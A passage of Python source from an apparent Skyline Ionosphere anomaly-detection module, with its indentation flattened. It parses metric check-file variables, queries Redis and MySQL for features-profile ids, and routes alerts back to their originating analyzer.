algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
try:
key = 'algorithms_run'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms_run = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms_run - %s' % str(algorithms_run))
except:
logger.error('error :: failed to read algorithms_run variable from check file setting to all - %s' % (metric_check_file))
if added_by == 'mirage':
algorithms_run = settings.MIRAGE_ALGORITHMS
else:
algorithms_run = settings.ALGORITHMS
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('this check was added by ionosphere_learn so not removing check even though a check done Redis key exists')
removed_check_file_work_done = False
# @added 20200807 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
if removed_check_file_work_done:
logger.info('a check cache key exists and the check was not added by ionosphere_learn - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
# @added 20200908 - Feature #3734: waterfall alerts
# Remove waterfall alert item
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If added_by is analyzer_batch, log and change to analyzer so that
# Ionosphere routes any alerts back to anaylzer
if str(added_by) == 'analyzer_batch':
logger.info('metric variable - added_by - %s, now switching to analyzer to route alerts to anlayzer, thanks analyzer_batch' % added_by)
added_by = 'analzyer'
logger.info('metric variable - added_by - %s, analyzer_batch checks will have alerts routed to analyzer' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file if an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('no alert cache key - %s' % cache_key)
else:
logger.info('removing check - alert cache key exists - %s' % cache_key)
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
self.remove_metric_check_file(str(metric_check_file))
return
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Do not evaluate batch metrics against max_age_seconds
analyzer_batch_anomaly = None
if BATCH_PROCESSING:
# Is this a analyzer_batch related anomaly?
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(metric_timestamp), metric)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('batch processing - not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if analyzer_batch_anomaly:
logger.info('batch anomaly not checking max_age_seconds for %s' % analyzer_batch_metric_anomaly_key)
else:
# @modified 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Wrapped in if analyzer_batch_anomaly
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times and each a closer
# match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it. Here we go! Learn!
metrics_db_object = None
# @modified 20190325 - Feature #2484: FULL_DURATION feature profiles
# Moved get_metrics_db_object block to common_functions.py
try:
metrics_db_object = get_metrics_db_object(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine metrics_db_object from get_metrics_db_object for %s' % base_name)
if metrics_db_object:
metrics_id = None
try:
metrics_id = int(metrics_db_object['id'])
except:
# @added 20190509 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# Added a traceback here to debug an issue
logger.error(traceback.format_exc())
logger.error('error :: could not determine id from metrics_db_object for %s' % base_name)
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
if metrics_id:
# @modified 20190510 - Bug #2984: Ionosphere - could not determine values from metrics_db_object
# metric_ionosphere_enabled = int(metrics_db_object['ionosphere_enabled'])
metric_ionosphere_enabled = None
try:
metric_ionosphere_enabled = metrics_db_object['ionosphere_enabled']
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics_db_object for %s' % base_name)
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
if metric_ionosphere_enabled == 1:
training_metric = False
if metric_ionosphere_enabled == 0:
training_metric = True
else:
metrics_id = None
metric_ionosphere_enabled = None
training_metric = True
logger.error('error :: could not determine metric id from memcache or metrics tables for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back are quite difficult to ascetain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
feedback_metric = False
if ionosphere_busy:
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
break
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
if feedback_metric:
for do_not_skip in DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES:
pattern_match = False
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES)
del metric_matched_by
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: matched_or_regexed_in_list failed checking %s in DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES - %s' % (
base_name, e))
pattern_match = False
if pattern_match:
feedback_metric = False
logger.info('%s matched DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES, will analyse' % base_name)
if feedback_metric:
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
logger.info('feedback metric identified adding Redis key with 600 TTL - %s' % cache_key)
try:
self.redis_conn.setex(cache_key, 600, int(time()))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s key to Redis' % (
str(cache_key)))
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
logger.info('determing max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error ::ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
logger.error('error ::ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis ionosphere.ionosphere_non_smtp_alerter_metrics list is created here to
# replace the self.ionosphere_non_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere.ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name in self.ionosphere_non_smtp_alerter_metrics:
if base_name in ionosphere_non_smtp_alerter_metrics:
# @modified 20191114 - Feature #: forward_alert
# Allow ionosphere to check any metrics that have an alerter other than smtp set, apart from syslog
# logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
logger.info('Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s which is a training_metric' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.training_metrics.append(base_name)
redis_set = 'ionosphere.training_metrics'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
redis_anomaly_json = False
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
logger.info('no training data Redis full duration json was not found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
# patterns work and the database lay out if defined we can begin on the
# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
# exactly how it was suppose to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
# Set result to None here to fix a interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# After the features profile evaluations this fps_db_object will
# be used to determine what settings.FULL_DURATION features
# profiles need to be created for ionosphere_echo
fps_db_object = None
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# Set both fp_count_with_echo and fp_count to 0 initially so that
# if the are echo fps, then the database can be updated with the
# fp_count_with_echo value for fp_count in the ionosphere_matched
# table
fp_count = 0
fp_count_with_echo = 0
try:
connection = engine.connect()
# @modified 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
# @modified 20210429 - Feature #4014: Ionosphere - inference
# Task #2446: Optimize Ionosphere
# For efficiency order by the last fp matched, if there are
# multipe features profiles and one matches chances are the
# that the metric may be sent through for multiple time over
# a period. When a features profilee matches, chances are it
# will match again multiple times for that incident period.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.last_matched))
result = connection.execute(stmt)
# @added 20190326 - Feature #2484: FULL_DURATION feature profiles
# To be used for ionosphere_echo
fps_db_object = [{column: value for column, value in rowproxy.items()} for rowproxy in result]
# for row in result:
for row in fps_db_object:
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
else:
# @modified 20200717 - Bug #3382: Prevent ionosphere.learn loop edge cases
# Added the fp full_duration for clarity sake
# logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
logger.info('not using fp id %s of full_duration %s as does not match full_duration %s - %s' % (
str(fp_id), str(row['full_duration']), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
# @added 20200908 - Feature #3734: waterfall alerts
# If any layers are found but any fps for analysis have been
# discarded because of echo rate limiting or they do not match
# the fulll duration, still check any enabed layers
if fp_layers_count:
logger.info('there are %s fp layers for %s' % (str(fp_layers_count), base_name))
fp_ids_found = True
else:
fp_ids_found = True
# TODO
# @added 20210814 - Feature #4232: ionosphere_shared features profiles
# Get the fp_ids from the ionosphere_shared table and append them
# to the fp_ids. Consider layers and echo fps
# Considerations
# * layers
# * echo fps, specifically in the creation, so that the same ionosphere_shared entries are created for echo fps
# TODO
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# If there are no features profiles enabled for the metric
# send it back to the source to alert and update the DB with
# ionosphere_enabled=0, it has been willy nillied, all its
# fps have been disabled. This has the ramification that
# any layers the metric has will be disabled as well
if added_by != 'ionosphere_learn':
logger.info('%s has been willy nillied, all its features profiles have been disabled, but it is still flagged as ionosphere_enabled' % (base_name))
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(cache_key, 300, str(cache_key_value))
# logger.info('added Redis alert key - %s - %s' % (
# cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# Update DB as to the fact that the metric is an ionosphere
# metric, all its fps have been disabled, it has been willy
# nillied
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
connection = engine.connect()
connection.execute(
metrics_table.update(
metrics_table.c.id == metrics_id).
values(ionosphere_enabled=0))
connection.close()
logger.info('updated %s to ionosphere_enabled=0' % (
base_name))
logger.info('%s has been unwilly nillied' % (base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @added 20200930 - Feature #3734: waterfall alerts
# Send to Panorama as Mirage and Analyzer will not.
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
# anomaly so the the use does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
# Allow Graphite resources to be created if they are not an alert
# was not sent therefore features do not need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
# @added 20200908 - Feature #3734: waterfall alerts
# Return to sender to alert
if added_by != 'ionosphere_learn':
remove_waterfall_alert(added_by, metric_timestamp, base_name)
logger.info('sending %s back to %s to alert' % (base_name, added_by))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
matched_motifs = {}
fps_checked_for_motifs = []
# @modified 20210426 - Feature #4014: Ionosphere - inference
# Do not run inference on ionosphere_learn jobs
